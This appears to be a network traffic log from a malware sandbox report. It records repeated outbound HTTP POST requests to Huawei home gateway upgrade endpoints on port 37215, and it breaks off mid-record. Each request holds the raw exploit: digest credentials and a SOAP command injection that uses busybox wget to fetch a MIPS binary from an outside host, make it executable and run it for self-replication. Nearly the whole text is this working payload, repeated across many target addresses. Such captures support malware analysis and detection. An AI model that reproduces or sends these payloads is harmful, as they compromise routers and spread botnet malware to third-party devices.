                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1461192.168.2.1534330197.86.121.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866872072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1462192.168.2.154333441.221.115.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866893053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1463192.168.2.1539624157.170.113.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866964102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1464192.168.2.1544474197.173.201.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866983891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1465192.168.2.1552712157.50.181.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.867132902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1466192.168.2.154959441.97.254.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.867423058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1467192.168.2.154829641.200.203.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.867660046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1468192.168.2.154663495.22.120.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.867944002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1469192.168.2.153797268.213.7.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.867971897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1470192.168.2.1552560157.33.194.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.873473883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 